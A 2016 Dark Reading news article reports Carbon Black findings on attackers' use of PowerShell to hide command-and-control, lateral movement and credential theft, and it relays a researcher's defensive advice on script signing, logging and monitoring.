Endpoint

4/15/2016
03:14 PM
Connect Directly
Twitter
LinkedIn
RSS
E-Mail
50%
50%

PowerShell Increasingly Being Used To Hide Malicious Activity

Data from 1,100 security investigations shows PowerShell was used in 38 percent of cyberattacks

Threat actors often try to take advantage of native tools in operating systems to conceal malicious activities.

One tool that appears to be a particular favorite in this regard is the PowerShell command shell and scripting language that Microsoft has included with its Windows operating system since 2009.

Security firm Carbon Black recently analyzed data from 1,100 investigations conducted by more than two-dozen of its partners in 2015 to see how extensively PowerShell is being exploited in cyber attacks.

The data showed that in 38 percent of the investigated incidents, PowerShell was a part of the attack.  Some 31 percent of the victim organizations said they had no idea that PowerShell had been exploited and discovered that fact only after calling in someone to investigate security incidents.

The most common malicious activity carried out via PowerShell was command and control communications. The data also showed that threat actors, trying to move laterally across a network after breaking into it first, often used PowerShell to conceal their movement. Credential theft and privilege escalation were some of the other common malicious activities enabled via PowerShell.

More than 85 percent of the attacks leveraging PowerShell were what Carbon Black described as commodity attacks such as clickfraud, ransomware, fake antivirus and other opportunistic threats. Many of these attacks appeared focused on stealing customer and financial data, and intellectual property, or on disrupting services. About 13 percent of the attacks appeared targeted, according to Carbon Black.

PowerShell is commonly used to automate repetitive tasks and for system administration purposes. Administrators for instance often use it to access remote systems in order to query them and for executing commands on them.

What makes it an appealing target for compromise is the opportunity it gives attackers to hide malicious activity, Carbon Black said in its report. PowerShell is a ubiquitous part of the Windows environment and is used more for legitimate purposes than not. Therefore it serves as a perfect foil for threat actors to hide their activities, the Carbon Black report noted.

“Its ability to dynamically load and execute code without touching the file system makes it especially difficult to secure,” the company warned.

As is common with many multi-stage attacks these days, PowerShell compromises usual begin via a separate initial compromise enabled through a phishing email or some other social engineering tactic. In a typical attack, a victim might receive a specially crafted Microsoft Office document as an email attachment or as a download via a link in the email. Opening the document usually results in the user being prompted to disable their macro security.

“Many enterprises make extensive use of macros in spreadsheets and Word documents,” says Rico Valdez, senior threat researcher at Carbon Black in comments to Dark Reading. So a target might already be accustomed to disabling macros security to enable enhanced functionality in their docs, he said. “A well-crafted phish in which the target believes the document is coming from a trusted source might have the target believe the macros are legitimate.”

Enterprises need to be cognizant of the risks around PowerShell, Valdez says. What used to be considered a more sophisticated technique until relatively recently has entered the mainstream and is being used in all kinds of attacks, including commodity malware, he says. According to Carbon Black, the relatively easy availability of toolkits such as PowerSploit, PowerShell Empire, p0wnedShell have also made it simple for threat actors to co-opt PowerShell in cyberattacks.

The trend heightens the need for organizations to pay attention to things like setting standards for PowerShell usage, by, for instance, requiring only signed scripts to execute.

Organizations should also consider capturing and monitoring PowerShell executions and storing the log data centrally so an attacker cannot tamper with it. Administrators can then set up alerts on key indicators in the log data, Valdez says. Blocking PowerShell altogether is another option, though that might not always be possible, he says.

“Profile and understand how PowerShell is used in your environment, and watch for or block use that does not meet that profile,” Valdez says. “PowerShell pulling down scripts from the Internet, being invoked with specific parameters, or being launched by users or processes that are not typical in your environment can go a long way toward identifying and stopping these attacks.”

Related stories:

 

Gain insight into the latest threats and emerging best practices for managing them. Attend the Security Track at Interop Las Vegas, May 2-6. Register now!

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ... View Full Bio

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
GeethaR978
50%
50%
GeethaR978,
User Rank: Apprentice
4/16/2016 | 3:26:07 AM
informative
very informative. Helps to gain knowledge about new information and concepts.
Tips for the Aftermath of a Cyberattack
Kelly Sheridan, Staff Editor, Dark Reading,  4/17/2019
Former Student Admits to USB Killer Attack
Dark Reading Staff 4/18/2019
Register for Dark Reading Newsletters
White Papers
Video
Cartoon
Current Issue
5 Emerging Cyber Threats to Watch for in 2019
Online attackers are constantly developing new, innovative ways to break into the enterprise. This Dark Reading Tech Digest gives an in-depth look at five emerging attack trends and exploits your security team should look out for, along with helpful recommendations on how you can prevent your organization from falling victim.
Flash Poll
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2019-11332
PUBLISHED: 2019-04-18
MKCMS 5.0 allows remote attackers to take over arbitrary user accounts by posting a username and e-mail address to ucenter/repass.php, which triggers e-mail transmission with the password, as demonstrated by 123456.
CVE-2019-9161
PUBLISHED: 2019-04-18
WAC on the Sangfor Sundray WLAN Controller version 3.7.4.2 and earlier has a Remote Code Execution issue allowing remote attackers to achieve full access to the system, because shell metacharacters in the nginx_webconsole.php Cookie header can be used to read an etc/config/wac/wns_cfg_admin_detail.x...
CVE-2019-11015
PUBLISHED: 2019-04-18
A vulnerability was found in the MIUI OS version 10.1.3.0 that allows a physically proximate attacker to bypass Lockscreen based authentication via the Wallpaper Carousel application to obtain sensitive Clipboard data and the user's stored credentials (partially). This occurs because of paste access...
CVE-2019-11331
PUBLISHED: 2019-04-18
Network Time Protocol (NTP), as specified in RFC 5905, uses port 123 even for modes where a fixed port number is not required, which makes it easier for remote attackers to conduct off-path attacks.
CVE-2019-9160
PUBLISHED: 2019-04-18
WAC on the Sangfor Sundray WLAN Controller version 3.7.4.2 and earlier has a backdoor account allowing a remote attacker to login to the system via SSH (on TCP port 22345) and escalate to root (because the password for root is the WebUI admin password concatenated with a static string).